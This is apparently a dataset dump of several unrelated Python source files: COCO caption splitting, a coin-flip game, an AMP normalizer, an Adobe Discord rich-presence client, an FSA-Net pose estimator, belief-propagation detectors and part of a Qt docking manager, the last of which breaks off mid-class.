    image_subdirs = [x[2] for x in os.walk(image_dir + '/' + name + '/' + t_type + '/')]
    if t_type == 'train':
        input_path = json_file + '/captions_train2014.json'
    else:
        input_path = json_file + '/captions_val2014.json'
    make_dir(output_dir)
    output_path = output_dir + '/' + name
    make_dir(output_path)
    output_path += '/captions_%s.json' % (t_type)
    # The 'test' split was carved out of the validation set, so its image
    # file names follow the val naming convention below.
    if t_type == 'test':
        t_type = 'val'
    with open(input_path) as json_file:
        data = json.load(json_file)
    split_json = dict()
    split_json['info'] = data['info']
    split_json['licenses'] = data['licenses']
    split_json['images'] = []
    split_json['annotations'] = []
    split_json['type'] = 'captions' # Add this to adapt with coco-eval
    for image in data['images']:
        if image['file_name'] in image_subdirs[0]:
            split_json['images'].append(image)
    for annotation in data['annotations']:
        image_id = annotation['image_id']
        file_name = ('COCO_%s2014_%012d.jpg' % (t_type, image_id))
        if file_name in image_subdirs[0]:
            split_json['annotations'].append(annotation)
    print("Finishing build JSON object to dump to {}".format(output_path))
    with open(output_path, 'w') as file:
        json.dump(split_json, file)
def main(args):
    """Build train/val/test caption annotation files for ``args.name``."""
    for split in ('train', 'val', 'test'):
        create_annotations(args.image_dir, args.json_file, args.output_dir, split, args.name)
if __name__ == '__main__':
    # CLI: paths to the image folders, the COCO JSON files and the output dir.
    parser = argparse.ArgumentParser()
    parser.add_argument('--image_dir', type=str, default='../data/img', help='directory for images')
    parser.add_argument('--json_file', type=str, default='../dataset/original/annotations_trainval2014',
                        help='directory for json files')
    parser.add_argument('--output_dir', type=str, default='../data/annotations', help='directory for output json file')
    parser.add_argument('--name', type=str, default='base20', help='name of folder')
    args = parser.parse_args()
    main(args)
| 2.953125 | 3 |
homework/modules/challenge_3.py | xParadoxx/coding-winter-session | 0 | 12760303 | <filename>homework/modules/challenge_3.py
"""
Write a program that plays a simple coin flip game with the user.
NOTE:
" heads" != "heads"
"HEADS" != "heads"
global variables are defined at the import level; they are always in all caps, and represent constant, unchanging
values
"""
from random import randint
# Canonical move names; all comparisons use these lowercase forms.
HEADS = "heads"
TAILS = "tails"
def get_user_move():
    """Prompt the player and return their choice, normalized to lowercase."""
    return input(f"{HEADS} or {TAILS}? ").strip().lower()
def coin_flip():
    """Flip a fair coin: 1 maps to heads, 2 maps to tails."""
    return HEADS if randint(1, 2) == 1 else TAILS
def main():
    """Play one round: read the user's call, flip the coin, report the result."""
    user_move = get_user_move()
    if user_move != HEADS and user_move != TAILS:
        print("that's not a possibility")
        return
    coin_toss = coin_flip()
    print(f"your move was {user_move} and the flip was {coin_toss}")
    if user_move == coin_toss:
        print("you got it!!")
    else:
        print("better luck next time")


# Run a single round on execution (this script has no __main__ guard).
main()
| 4.25 | 4 |
spinup/replay_buffers/amp_utils/deep_mimic_normalizer.py | florianHoidn/spinningup | 0 | 12760304 | <reponame>florianHoidn/spinningup<filename>spinup/replay_buffers/amp_utils/deep_mimic_normalizer.py
import numpy as np
class DeepMimicStyleNormalizer():
    """
    Running mean/std normalizer modeled on DeepMimic's Normalizer, meant for
    internal use by the AMP discriminator in an AMPReplayBuffer.

    Samples are accumulated with ``record`` and folded into the running
    statistics with ``update``.  Dimensions may be grouped so that a group
    shares one statistic (or is excluded from updates entirely).
    """
    NORM_GROUP_SINGLE = 0   # every dimension keeps its own statistic
    NORM_GROUP_NONE = -1    # dimensions excluded from statistic updates

    class Group(object):
        """A set of feature indices that share one normalization statistic."""
        def __init__(self, id, indices):
            self.id = id
            self.indices = indices

    def __init__(self, size, groups_ids=None, eps=0.02, clip=np.inf):
        self.eps = eps      # lower bound on std, avoids division blow-ups
        self.clip = clip    # clamp applied to normalized values
        self.mean = np.zeros(size)
        self.mean_sq = np.zeros(size)
        self.std = np.ones(size)
        self.count = 0
        self.groups = self._build_groups(groups_ids)
        # Buffers for samples recorded since the last update().
        self.new_count = 0
        self.new_sum = np.zeros_like(self.mean)
        self.new_sum_sq = np.zeros_like(self.mean_sq)

    def record(self, x):
        """Accumulate one sample or a batch reshaped to ``(-1, size)``."""
        size = self.get_size()
        if size <= 0:
            return
        if not isinstance(x, np.ndarray):
            x = np.array([[x]])
        x = np.reshape(x, [-1, size])
        self.new_count += x.shape[0]
        self.new_sum += np.sum(x, axis=0)
        self.new_sum_sq += np.sum(np.square(x), axis=0)

    def update(self):
        """Fold the recorded samples into the running mean/std.

        Bug fix: the previous version collapsed ``new_sum``/``new_sum_sq`` to
        scalars with ``np.sum`` (a leftover of DeepMimic's MPI reduction),
        which destroyed the per-dimension statistics whenever size > 1.
        """
        new_count = self.new_count
        new_total = self.count + new_count
        if new_count > 0:
            new_mean = self._process_group_data(self.new_sum / new_count, self.mean)
            new_mean_sq = self._process_group_data(self.new_sum_sq / new_count, self.mean_sq)
            # Count-weighted blend of old and new first/second moments.
            w_old = float(self.count) / new_total
            w_new = float(new_count) / new_total
            self.mean = w_old * self.mean + w_new * new_mean
            self.mean_sq = w_old * self.mean_sq + w_new * new_mean_sq
            self.count = new_total
            self.std = self.calc_std(self.mean, self.mean_sq)
        self.new_count = 0
        self.new_sum.fill(0)
        self.new_sum_sq.fill(0)

    def get_size(self):
        """Number of normalized dimensions."""
        return self.mean.size

    def set_mean_std(self, mean, std):
        """Directly overwrite the running mean/std (scalars are wrapped)."""
        is_array = isinstance(mean, np.ndarray) and isinstance(std, np.ndarray)
        if not is_array:
            mean = np.array([mean])
            std = np.array([std])
        self.mean = mean
        self.std = std
        self.mean_sq = self.calc_mean_sq(self.mean, self.std)

    def normalize(self, x):
        """Return ``(x - mean) / std`` clipped to ``[-clip, clip]``."""
        norm_x = (x - self.mean) / self.std
        return np.clip(norm_x, -self.clip, self.clip)

    def unnormalize(self, norm_x):
        """Inverse of :meth:`normalize` (clipping is not undone)."""
        return norm_x * self.std + self.mean

    def calc_std(self, mean, mean_sq):
        """Std from first and second moments, floored at ``eps``."""
        var = mean_sq - np.square(mean)
        # Floating point errors can produce tiny negative variances.
        var = np.maximum(var, 0)
        return np.maximum(np.sqrt(var), self.eps)

    def calc_mean_sq(self, mean, std):
        """Second moment implied by a given mean and std.

        Bug fix: previously read ``self.mean`` instead of the ``mean``
        argument (harmless only because the sole caller assigned
        ``self.mean`` first).
        """
        return np.square(std) + np.square(mean)

    def _build_groups(self, groups_ids):
        """Build Group objects; defaults to one per-dimension group."""
        groups = []
        if groups_ids is None:
            all_indices = np.arange(self.get_size()).astype(np.int32)
            groups.append(self.Group(self.NORM_GROUP_SINGLE, all_indices))
        else:
            for id in np.unique(groups_ids):
                curr_list = np.nonzero(groups_ids == id)[0].astype(np.int32)
                groups.append(self.Group(id, curr_list))
        return groups

    def _process_group_data(self, new_data, old_data):
        """Apply group semantics to freshly computed per-dimension data."""
        proc_data = new_data.copy()
        for group in self.groups:
            if group.id == self.NORM_GROUP_NONE:
                # Frozen dimensions keep their previous statistic.
                proc_data[group.indices] = old_data[group.indices]
            elif group.id != self.NORM_GROUP_SINGLE:
                # Shared group: replace every member with the group average.
                proc_data[group.indices] = np.mean(new_data[group.indices])
        return proc_data
return proc_data | 2.25 | 2 |
rpc.py | pcislocked/adobe-rpc | 0 | 12760305 | from pypresence import Presence
import handler
import time
# Discord application id used for the Adobe rich-presence client.
client_id = "807964106673225748"
rich_presence = Presence(client_id)
def connect():
    """Open the IPC connection to the locally running Discord client."""
    return rich_presence.connect()
def connect_loop(retries=0):
    """Try to reach the local Discord client, retrying up to 10 times.

    On success, hands control to ``update_loop``; gives up silently after
    the retry budget is exhausted.
    """
    if retries > 10:
        return
    try:
        connect()
    except Exception:
        # Bug fix: a bare ``except`` also swallowed KeyboardInterrupt here,
        # defeating the Ctrl-C handler installed at module level.
        print("Where is Discord?")
        time.sleep(10)
        retries += 1
        connect_loop(retries)
    else:
        update_loop()
        print("Started Adobe RPC - pcislocked edited")
def update_loop():
    """Continuously push Adobe status to Discord every 15 seconds.

    On any error (e.g. Adobe closed), clears the presence, waits two
    seconds and starts over.  Bug fixes: the retry is now iterative (the
    old version recursed on every failure and would eventually exhaust the
    stack), and the bare ``except`` no longer catches KeyboardInterrupt,
    so Ctrl-C reaches the module-level handler.
    """
    while True:
        try:
            while True:
                rpc_data = handler.get_rpc_update()
                rich_presence.update(state=rpc_data['state'],
                                     small_image=rpc_data['small_image'],
                                     large_image=rpc_data['large_image'],
                                     large_text=rpc_data['large_text'],
                                     small_text="pcislocked's AdobeRPC",
                                     details=rpc_data['details'],
                                     start=rpc_data['create_time'])
                # Discord rate-limits presence updates to one per 15 seconds.
                time.sleep(15)
        except Exception:
            rich_presence.clear()
            print("Exception: I can't find Adobe(maybe?)")
            time.sleep(2)
try:
    # Entry point: retries until Discord is reachable, then loops forever.
    connect_loop()
except KeyboardInterrupt:
    print("Adobe RPC is gone 🦀")
    quit()
| 2.75 | 3 |
face_pose_dataset/estimation/base/fsanet.py | samuelbaltanas/face-pose-dataset | 1 | 12760306 | <reponame>samuelbaltanas/face-pose-dataset
import logging
import os
from typing import Tuple
import cv2
import numpy as np
import pkg_resources
import tensorflow.compat.v1 as tf
from tensorflow.keras.layers import Average
import face_pose_dataset as fpdata
from face_pose_dataset import core
from face_pose_dataset.estimation import interface, mtcnn
from face_pose_dataset.third_party.fsa_estimator import FSANET_model
# tf.disable_v2_behavior()
__all__ = ["FSAEstimator", "SSDDetector"]
class SSDDetector:
    """Face detector backed by OpenCV's ResNet-10 SSD Caffe model."""

    def __init__(self):
        # load our serialized face detector from disk
        logging.debug("Loading face detector.")
        proto_path = os.path.join(
            fpdata.PROJECT_ROOT, "data", "face_detector", "deploy.prototxt"
        )
        model_path = os.path.join(
            fpdata.PROJECT_ROOT,
            "data",
            "face_detector",
            "res10_300x300_ssd_iter_140000.caffemodel",
        )
        logging.debug("Face detector loaded.")
        self.net = cv2.dnn.readNetFromCaffe(proto_path, model_path)

    def run(self, input_img: np.ndarray, threshold=0.8) -> np.ndarray:
        """Detect faces; keep only detections with confidence >= threshold.

        Returns the SSD output of shape (1, 1, N, 7); column 2 is the
        confidence, columns 3:7 are the normalized box coordinates.
        """
        # Mean values (104, 177, 123) match the model's training preprocessing.
        blob = cv2.dnn.blobFromImage(
            cv2.resize(input_img, (300, 300)), 1.0, (300, 300), (104.0, 177.0, 123.0),
        )
        self.net.setInput(blob)
        detected = self.net.forward()
        detected = detected[:, :, detected[0, 0, :, 2] >= threshold, :]
        return detected
def extract_faces(
    input_image: np.ndarray,
    detection: np.ndarray,
    shape: Tuple[int, int] = (300, 300),
    threshold: float = 0.8,
    margin: float = 0.6,
    normalize: bool = False,
):
    """Crop every detected face out of *input_image*, resized to *shape*.

    Parameters
    ----------
    input_image : np.ndarray
        BGR image the detections refer to.
    detection : np.ndarray
        Raw SSD output of shape (1, 1, N, 7); columns 3..6 hold relative
        box corners.  NOTE: the coordinate columns are scaled to pixel
        units in place (the caller's array is mutated).
    shape : tuple
        Output (height, width) of each face crop.
    threshold : float
        Unused here; kept for backward compatibility (filtering is done
        by the detector's ``run``).
    margin : float
        Relative margin added around each box before cropping.
    normalize : bool
        If True, min-max normalize each crop to the 0..255 range.

    Returns
    -------
    np.ndarray or None
        Integer array of shape (N, *shape, 3), or None if there are no
        detections.
    """
    faces = None

    if detection.shape[2] > 0:
        # ``np.int`` was a deprecated alias for the builtin ``int`` and was
        # removed in NumPy 1.24; use ``int`` directly (same dtype).
        faces = np.empty((detection.shape[2], *shape, 3), dtype=int)

        (h0, w0) = input_image.shape[:2]
        # Scale relative box coordinates to pixel coordinates (in place).
        detection[0, 0, :, 3:7] *= np.array([w0, h0, w0, h0])

        if margin > 0:
            w = detection[0, 0, :, 5] - detection[0, 0, :, 3]
            h = detection[0, 0, :, 6] - detection[0, 0, :, 4]

            detection[0, 0, :, 3] -= w * margin
            detection[0, 0, :, 4] -= h * margin
            detection[0, 0, :, 5] += w * margin
            detection[0, 0, :, 6] += h * margin

            del w, h

        # Integer copy; the clipping below operates on the copy only.
        detection = detection.astype(int)

        detection[0, 0, :, 3] = np.clip(detection[0, 0, :, 3], 0, input_image.shape[1])
        detection[0, 0, :, 5] = np.clip(detection[0, 0, :, 5], 0, input_image.shape[1])
        detection[0, 0, :, 4] = np.clip(detection[0, 0, :, 4], 0, input_image.shape[0])
        detection[0, 0, :, 6] = np.clip(detection[0, 0, :, 6], 0, input_image.shape[0])

        for idx, val in enumerate(detection[0, 0]):
            faces[idx, :, :, :] = cv2.resize(
                input_image[val[4] : val[6] + 1, val[3] : val[5] + 1, :], shape,
            )

            if normalize:
                faces[idx, :, :, :] = cv2.normalize(
                    faces[idx, :, :, :],
                    None,
                    alpha=0,
                    beta=255,
                    norm_type=cv2.NORM_MINMAX,
                )

    return faces
class FSAEstimator(interface.Estimator):
    """Head-pose estimator wrapping three pretrained FSA-Net capsule models.

    The three variants (1x1 scoring, variance scoring, no scoring) are
    loaded and their predictions averaged into a single Keras model.
    """

    def __init__(self, use_gpu=False):
        # NOTE(review): ``use_gpu`` is ignored -- the device is chosen from
        # tf.config.list_physical_devices below.  Confirm intended behavior.
        self.img_size = 64, 64

        # FSA-Net hyper-parameters (capsule layout and stage configuration).
        num_capsule = 3
        dim_capsule = 16
        routings = 2
        stage_num = [3, 3, 3]
        lambda_d = 1
        num_classes = 3
        num_primcaps = 7 * 3
        m_dim = 5
        s_set = [num_capsule, dim_capsule, routings, num_primcaps, m_dim]

        gpus_available = tf.config.list_physical_devices(device_type="GPU")
        logging.info("[FSANET] GPUs available: %s.", gpus_available)

        if gpus_available:
            config = tf.ConfigProto(
                log_device_placement=False,  # logging.getLogger().level < logging.INFO
            )
            # Grow GPU memory on demand instead of grabbing it all upfront.
            config.gpu_options.allow_growth = True
            logging.info("[FSANET] Set on GPU.")
        else:
            config = tf.ConfigProto(
                log_device_placement=False,  # logging.getLogger().level < logging.INFO,
                device_count={"CPU": 1, "GPU": 0},
            )
            logging.info("[FSANET] Set on CPU.")

        # TF1-style session/graph: kept so predict() can re-enter the graph.
        self.session = tf.InteractiveSession(config=config)
        tf.compat.v1.keras.backend.set_session(self.session)
        self.graph = tf.get_default_graph()

        with self.graph.as_default():
            model1 = FSANET_model.FSA_net_Capsule(
                self.img_size[0], num_classes, stage_num, lambda_d, s_set
            )()
            model2 = FSANET_model.FSA_net_Var_Capsule(
                self.img_size[0], num_classes, stage_num, lambda_d, s_set
            )()

            # The no-scoring variant uses a larger primary-capsule count.
            num_primcaps = 8 * 8 * 3
            s_set = [num_capsule, dim_capsule, routings, num_primcaps, m_dim]

            model3 = FSANET_model.FSA_net_noS_Capsule(
                self.img_size[0], num_classes, stage_num, lambda_d, s_set
            )()

            logging.info("[FSANET] Loading data ...")

            weight_file1 = pkg_resources.resource_filename(
                "face_pose_dataset",
                "data/FSA_300W_LP_model/fsanet_capsule_3_16_2_21_5/fsanet_capsule_3_16_2_21_5.h5",
            )
            model1.load_weights(weight_file1)
            logging.info("[FSANET] Model 1 loaded.")

            weight_file2 = pkg_resources.resource_filename(
                "face_pose_dataset",
                "data/FSA_300W_LP_model/fsanet_var_capsule_3_16_2_21_5/fsanet_var_capsule_3_16_2_21_5.h5",
            )
            model2.load_weights(weight_file2)
            logging.info("[FSANET] Model 2 loaded.")

            weight_file3 = pkg_resources.resource_filename(
                "face_pose_dataset",
                "data/FSA_300W_LP_model/fsanet_noS_capsule_3_16_2_192_5/fsanet_noS_capsule_3_16_2_192_5.h5",
            )
            model3.load_weights(weight_file3)
            logging.info("[FSANET] Model 3 loaded.")

            # Ensemble: average the three pose predictions.
            inputs = FSANET_model.Input(shape=(*self.img_size, 3))
            x1 = model1(inputs)  # 1x1
            x2 = model2(inputs)  # var
            x3 = model3(inputs)  # w/o
            avg_model = Average()([x1, x2, x3])

            self.model = FSANET_model.Model(inputs=inputs, outputs=avg_model)
            logging.info("[FSANET] Loaded.")

    def preprocess_image(self, frame: np.ndarray, bbox: np.ndarray) -> np.ndarray:
        """Crop the face given by *bbox* to a normalized 64x64 batch of one."""
        # DONE Test 0.4 margin instead of 0.6
        res = mtcnn.extract_face(
            frame, (64, 64), bbox, landmark=None, margin=0.6, normalize=True
        )
        return np.expand_dims(res, 0)

    def run(self, input_images: np.ndarray) -> 'core.Angle':
        """Predict the head pose for a batch; the roll sign is negated."""
        with self.graph.as_default():
            tf.keras.backend.set_session(self.session)
            yaw, pitch, roll = self.model.predict(input_images)[0]

        ang = core.Angle(yaw=yaw, pitch=pitch, roll=-roll)
        return ang
# No CLI behavior: this module only provides estimator/detector classes.
if __name__ == "__main__":
    pass
src/loopy_modules.py | joennlae/amp | 7 | 12760307 | '''
This file implements the detection algorithms (message passing) on markov random field of graphs generated by ER model.
The algorithms defined in this file would be imported by bin/varying_loopy.py
For the specifics about the algorithms, please see the description in manuscript/amp.pdf.
'''
import numpy as np
import itertools
import factorgraph as fg
import maxsum
import alphaBP
from scipy.stats import multivariate_normal
######################################################################
class ML(object):
    """Exhaustive maximum-likelihood detector.

    Enumerates every candidate symbol vector over the constellation and
    returns the one minimising the energy ``x^T S x + b . x``.
    """

    def __init__(self, hparam):
        self.hparam = hparam
        self.constellation = hparam.constellation

    def detect(self, S, b):
        """Return the energy-minimising symbol tuple for the pair (S, b)."""
        best_energy = np.inf
        best_candidate = None
        for candidate in itertools.product(self.constellation,
                                           repeat=self.hparam.num_tx):
            vec = np.array(candidate)
            energy = np.matmul(vec, S).dot(vec) + b.dot(vec)
            if energy < best_energy:
                best_energy = energy
                best_candidate = candidate
        return best_candidate
class Marginal(object):
    """Exact (brute-force) marginals of the Boltzmann distribution
    ``p(x) ∝ exp(-x^T S x - b . x)`` over the constellation."""

    def __init__(self, hparam):
        self.hparam = hparam
        self.constellation = hparam.constellation

    def detect(self, S, b):
        """Return an (n_vars, |constellation|) array of normalised marginals."""
        n_vars = S.shape[0]
        candidates = np.array(
            list(itertools.product(self.constellation, repeat=n_vars))
        )
        # Unnormalised probability of every joint configuration.
        energies = np.array(
            [np.matmul(c, S).dot(c) + b.dot(c) for c in candidates]
        )
        weights = np.exp(-energies)

        marginals = []
        for var in range(b.shape[0]):
            per_code = np.array(
                [weights[candidates[:, var] == code].sum()
                 for code in self.constellation]
            )
            # Normalise each variable's marginal to sum to one.
            marginals.append(per_code / per_code.sum())
        return np.array(marginals)
class LoopyBP(object):
    """Loopy belief propagation on the pairwise MRF defined by
    ``p(x) ∝ exp(-x^T S x - b . x)`` over a discrete constellation."""

    def __init__(self, noise_var, hparam):
        # NOTE(review): ``noise_var`` is unused; presumably kept for a uniform
        # constructor signature across detectors -- confirm.
        # get the constellation
        self.constellation = hparam.constellation
        self.hparam = hparam
        # set the graph
        self.graph = fg.Graph()
        # add the discrete random variables to graph
        self.n_symbol = hparam.num_tx
        for idx in range(hparam.num_tx):
            self.graph.rv("x{}".format(idx), len(self.constellation))

    def set_potential(self, S, b):
        """Install unary and pairwise factors derived from (S, b)."""
        s = S
        for var_idx in range(self.hparam.num_tx):
            # set the first type of potentials, the standalone potentials
            f_x_i = np.exp( - s[var_idx, var_idx] * np.power(self.constellation, 2)
                            - b[var_idx] * np.array(self.constellation))
            self.graph.factor(["x{}".format(var_idx)],
                              potential=f_x_i)

        for var_idx in range(self.hparam.num_tx):
            for var_jdx in range(var_idx + 1, self.hparam.num_tx):
                # set the cross potentials
                # NOTE(review): only strictly positive couplings get a pairwise
                # factor; negative entries of S are silently skipped.  Confirm
                # S is non-negative by construction (ER-graph adjacency).
                if s[var_idx, var_jdx] > 0:
                    t_ij = np.exp(-2* np.array(self.constellation)[None,:].T
                                  * s[var_idx, var_jdx] * np.array(self.constellation))
                    self.graph.factor(["x{}".format(var_jdx), "x{}".format(var_idx)],
                                      potential=t_ij)

    def fit(self, S, b, stop_iter=10):
        """ set potentials and run message passing"""
        self.set_potential(S, b)
        # run BP (normalized messages, at most stop_iter sweeps)
        iters, converged = self.graph.lbp(normalize=True,max_iters=stop_iter)

    def detect_signal_by_mean(self):
        # Per-variable MAP readout: pick the constellation point with the
        # largest marginal probability.
        estimated_signal = []
        rv_marginals = dict(self.graph.rv_marginals())
        for idx in range(self.n_symbol):
            x_marginal = rv_marginals["x{}".format(idx)]
            estimated_signal.append(self.constellation[x_marginal.argmax()])

        return estimated_signal

    def marginals(self):
        # Return all marginals as a normalized (n_symbol, |constellation|) array.
        marginal_prob = []
        rv_marginals = dict(self.graph.rv_marginals())
        for idx in range(self.n_symbol):
            x_marginal = rv_marginals["x{}".format(idx)]
            x_marginal = np.array(x_marginal)
            x_marginal = x_marginal/x_marginal.sum()
            marginal_prob.append(x_marginal)

        return np.array(marginal_prob)
class AlphaBP(LoopyBP):
    """Alpha belief propagation: same potentials as LoopyBP, but messages are
    passed on an ``alphaBP.alphaGraph`` parameterized by ``hparam.alpha``."""

    def __init__(self, noise_var, hparam):
        # NOTE(review): ``noise_var`` is unused, as in LoopyBP.
        self.hparam = hparam
        # get the constellation
        self.constellation = hparam.constellation
        self.n_symbol = hparam.num_tx
        # set the graph
        self.graph = alphaBP.alphaGraph(alpha=hparam.alpha)
        # add the discrete random variables to graph
        for idx in range(hparam.num_tx ):
            self.graph.rv("x{}".format(idx), len(self.constellation))
class MMSEalphaBP(AlphaBP):
    """AlphaBP whose unary potentials are additionally weighted by a
    Gaussian prior derived from the linear MMSE estimate."""

    def set_potential(self, S, b):
        s = S
        # Gaussian prior: mean (I + 2S)^{-1} b, per-symbol variance from the
        # diagonal of the same inverse.
        inv = np.linalg.inv(np.eye(s.shape[0]) + 2 * s )
        prior_u = inv.dot(b)
        for var_idx in range(s.shape[1]):
            # set the first type of potentials, the standalone potentials
            f_x_i = np.exp( - s[var_idx, var_idx] * np.power(self.constellation, 2)
                            - b[var_idx] * np.array(self.constellation))
            prior_i = np.exp(-0.5 * np.power(self.constellation - prior_u[var_idx], 2) \
                             / (inv[var_idx, var_idx]) )
            self.graph.factor(["x{}".format(var_idx)],
                              potential=f_x_i * prior_i)

        for var_idx in range(s.shape[1]):
            for var_jdx in range(var_idx + 1, s.shape[1]):
                # set the cross potentials
                if s[var_idx, var_jdx] > 0:
                    t_ij = np.exp(- 2 * np.array(self.constellation)[None,:].T
                                  * s[var_idx, var_jdx] * np.array(self.constellation))
                    self.graph.factor(["x{}".format(var_jdx), "x{}".format(var_idx)],
                                      potential=t_ij)
| 2.4375 | 2 |
qtpydocking/dock_manager.py | paunet/qtpydocking | 9 | 12760308 | <reponame>paunet/qtpydocking
import logging
import pathlib
from typing import TYPE_CHECKING, Dict, List
from qtpy.QtCore import (QByteArray, QSettings, QXmlStreamReader,
QXmlStreamWriter, Signal)
from qtpy.QtGui import QIcon
from qtpy.QtWidgets import QAction, QMainWindow, QMenu, QWidget
from .enums import InsertionOrder, DockFlags, DockWidgetArea, OverlayMode
from .dock_container_widget import DockContainerWidget
from .dock_overlay import DockOverlay
from .floating_dock_container import FloatingDockContainer
from .util import LINUX
try:
from qtpy.QtCore import qCompress, qUncompress
except ImportError:
qCompress = None
qUncompress = None
if TYPE_CHECKING:
from .dock_area_widget import DockAreaWidget
from .dock_widget import DockWidget
logger = logging.getLogger(__name__)
class DockManagerPrivate:
public: 'DockManager'
floating_widgets: List[FloatingDockContainer]
containers: List['DockContainerWidget']
container_overlay: DockOverlay
dock_area_overlay: DockOverlay
dock_widgets_map: Dict[str, 'DockWidget']
perspectives: Dict[str, QByteArray]
view_menu_groups: Dict[str, QMenu]
view_menu: QMenu
menu_insertion_order: InsertionOrder
restoring_state: bool
config_flags: DockFlags
    def __init__(self, public):
        '''
        Private data constructor

        Parameters
        ----------
        public : DockManager
            The public manager this private state belongs to.
        '''
        self.public = public
        self.floating_widgets = []      # registered floating containers
        self.containers = []            # all dock containers (manager + floating)
        self.container_overlay = None   # created later in DockManager.__init__
        self.dock_area_overlay = None   # created later in DockManager.__init__
        self.dock_widgets_map = {}      # objectName -> DockWidget
        self.perspectives = {}          # perspective name -> saved state
        self.view_menu_groups = {}      # group name -> QMenu
        self.view_menu = None           # created later in DockManager.__init__
        self.menu_insertion_order = InsertionOrder.by_spelling
        self.restoring_state = False    # True while a restore is in progress
        self.config_flags = DockFlags.default_config
    def check_format(self, state: QByteArray, version: int) -> bool:
        '''
        Checks if the given data stream is a valid docking system state file.

        Runs the XML restore in testing mode, so no widgets are modified.

        Parameters
        ----------
        state : QByteArray
        version : int
            Expected state-format version.

        Returns
        -------
        value : bool
        '''
        return self.restore_state_from_xml(state, version, testing=True)
    def restore_state_from_xml(self, state: QByteArray, version: int, testing: bool) -> bool:
        '''
        Restores the state by parsing the serialized XML document.

        Parameters
        ----------
        state : QByteArray
        version : int
        testing : bool
            When True, only validate the document; modify nothing.

        Returns
        -------
        value : bool
        '''
        if state.isEmpty():
            return False

        stream = QXmlStreamReader(state)
        stream.readNextStartElement()
        if stream.name() != "QtAdvancedDockingSystem":
            return False

        v = stream.attributes().value("Version")
        # NOTE(review): int(v) raises ValueError on a malformed Version
        # attribute instead of returning False -- confirm that is acceptable.
        if int(v) != version:
            return False

        result = True
        dock_containers = stream.attributes().value("Containers")
        logger.debug('dock_containers %s', dock_containers)

        dock_container_count = 0
        while stream.readNextStartElement():
            if stream.name() == "Container":
                result = self.restore_container(dock_container_count, stream,
                                                testing=testing)
                if not result:
                    break
                dock_container_count += 1

        if testing or not dock_container_count:
            return result

        # Delete remaining empty floating widgets
        floating_widget_index = dock_container_count - 1
        delete_count = len(self.floating_widgets) - floating_widget_index
        for i in range(delete_count):
            to_remove = self.floating_widgets[floating_widget_index + i]
            self.public.remove_dock_container(
                to_remove.dock_container()
            )
            to_remove.deleteLater()

        return result
    def restore_state(self, state: QByteArray, version: int) -> bool:
        '''
        Restore state: validates the format, then restores widgets, open
        states and dock-area indices.

        Parameters
        ----------
        state : QByteArray
        version : int

        Returns
        -------
        value : bool
        '''
        if not self.check_format(state, version):
            logger.debug('checkFormat: Error checking format!')
            return False

        # Hide updates of floating widgets from use
        self.hide_floating_widgets()
        self.mark_dock_widgets_dirty()

        if not self.restore_state_from_xml(state, version, testing=False):
            logger.debug('restoreState: Error restoring state!')
            return False

        self.restore_dock_widgets_open_state()
        self.restore_dock_areas_indices()
        self.emit_top_level_events()
        return True
    def restore_dock_widgets_open_state(self):
        """Re-apply the open/closed state of every dock widget after restore."""
        # All dock widgets, that have not been processed in the restore state
        # function are invisible to the user now and have no assigned dock area
        # They do not belong to any dock container, until the user toggles the
        # toggle view action the next time
        for dock_widget in self.dock_widgets_map.values():
            if dock_widget.property("dirty"):
                dock_widget.flag_as_unassigned()
            else:
                dock_widget.toggle_view_internal(
                    not dock_widget.property("closed")
                )
def restore_dock_areas_indices(self):
# Now all dock areas are properly restored and we setup the index of
# The dock areas because the previous toggleView() action has changed
# the dock area index
for dock_container in self.containers:
for i in range(dock_container.dock_area_count()):
dock_area = dock_container.dock_area(i)
dock_widget_name = dock_area.property("currentDockWidget")
dock_widget = None
if not dock_widget_name:
dock_widget = self.public.find_dock_widget(dock_widget_name)
if not dock_widget or dock_widget.is_closed():
index = dock_area.index_of_first_open_dock_widget()
if index < 0:
continue
dock_area.set_current_index(index)
else:
dock_area.internal_set_current_dock_widget(dock_widget)
    def emit_top_level_events(self):
        """Emit topLevelChanged() for every dock widget after a restore."""
        # Finally we need to send the topLevelChanged() signals for all dock
        # widgets if top level changed
        for dock_container in self.containers:
            top_level_dock_widget = dock_container.top_level_dock_widget()
            if top_level_dock_widget is not None:
                top_level_dock_widget.emit_top_level_changed(True)
            else:
                for i in range(dock_container.dock_area_count()):
                    dock_area = dock_container.dock_area(i)
                    for dock_widget in dock_area.dock_widgets():
                        dock_widget.emit_top_level_changed(False)
def hide_floating_widgets(self):
# Hide updates of floating widgets from use
for floating_widget in self.floating_widgets:
floating_widget.hide()
def mark_dock_widgets_dirty(self):
for dock_widget in self.dock_widgets_map.values():
dock_widget.setProperty("dirty", True)
    def restore_container(self, index: int, stream: QXmlStreamReader,
                          testing: bool) -> bool:
        '''
        Restores the container with the given index

        Index 0 is the main dock container; higher indices address floating
        containers.  In testing mode index 0 is always used so nothing is
        created.

        Parameters
        ----------
        index : int
        stream : QXmlStreamReader
        testing : bool

        Returns
        -------
        value : bool
        '''
        if testing:
            index = 0

        if index >= len(self.containers):
            # More containers in the state than currently exist: create a
            # new floating container to hold the extra one.
            floating_widget = FloatingDockContainer(dock_manager=self.public)
            result = floating_widget.restore_state(stream, testing)
        else:
            logger.debug('containers[%d].restore_state()', index)
            container = self.containers[index]
            if container.is_floating():
                result = container.floating_widget().restore_state(stream, testing)
            else:
                result = DockContainerWidget.restore_state(container, stream,
                                                           testing)

        return result
def load_stylesheet(self, fn=None):
'''
Loads the stylesheet
'''
if fn is None:
fn = self.public.default_style_sheet
with open(fn, 'rt') as f:
stylesheet = f.read()
self.public.setStyleSheet(stylesheet)
def add_action_to_menu(self, action: QAction, menu: QMenu, insert_sorted: bool):
'''
Adds action to menu - optionally in sorted order
Parameters
----------
action : QAction
menu : QMenu
insert_sorted : bool
'''
if insert_sorted:
actions = menu.actions()
if not actions:
menu.addAction(action)
else:
actions = [act.text() for act in actions] + [action.text()]
actions.sort()
menu.insertAction(actions.index(action.text()), action)
else:
menu.addAction(action)
class DockManager(DockContainerWidget):
default_style_sheet = pathlib.Path(__file__).parent / (
'default_linux.css' if LINUX else 'default.css')
# This signal is emitted if the list of perspectives changed
perspective_list_changed = Signal()
# This signal is emitted if perspectives have been removed
perspectives_removed = Signal()
# This signal is emitted, if the restore function is called, just before
# the dock manager starts restoring the state. If this function is called,
# nothing has changed yet
restoring_state = Signal()
# This signal is emitted if the state changed in restoreState. The signal
# is emitted if the restoreState() function is called or if the
# openPerspective() function is called
state_restored = Signal()
# This signal is emitted, if the dock manager starts opening a perspective.
# Opening a perspective may take more than a second if there are many complex
# widgets. The application may use this signal to show some progress
